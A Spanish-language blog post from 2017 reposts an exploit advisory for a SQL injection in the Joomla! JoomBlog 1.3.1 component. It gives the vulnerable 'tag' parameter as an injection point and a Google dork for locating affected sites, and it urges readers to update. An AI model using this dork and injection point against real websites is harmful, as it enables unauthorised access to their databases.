miércoles, 15 de febrero de 2017

JOOMLA 0DAY -> Joomla! Component JoomBlog 1.3.1 - SQL Injection




Buen día amigos.

Cómo siempre poniendo los 0day de las nuevas vulnerabilidades  de los sistemas JOOMLA - WORDPRESS que todos los días nos sorprenden.

En esta ocasión tenemos una SQL INJECTION que se aplica a un componente llamado:

JOOMLA! Component JOOMBLOG 1.3.1

 Con las siguientes características:

# # # # #
# Exploit Title: Joomla! Component JoomBlog v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomblog
# Date: 15.02.2017
# Vendor Homepage: http://joomplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/authoring-a-content/blog/joomblog/
# Demo: http://demo30.joomplace.com/our-products/joomblog/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan[SQL]
# # # # #
Esta vulnerabilidad afecta a 36,600 +- servidores web en el mundo, esto podemos comprobarlo haciendo una busqueda en google con el DORK proporcionado por el que descubrió este bug.




Amigos actualizen sus componentes de JOOMLA ya que estan al dia las vulnerabiliades.


Saludos.

Li. Rodolfo H. Baz
www.rodolfohbaz.net





en
Etiquetas: , , , , , , , , , , , , , , , , , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)

Reportan caída de Facebook e Instagram a nivel mundial

  Reportan caída de Facebook e Instagram a nivel mundial Las sesiones de lo usuarios caducaron y al intentar acceder no pudieron volver a in...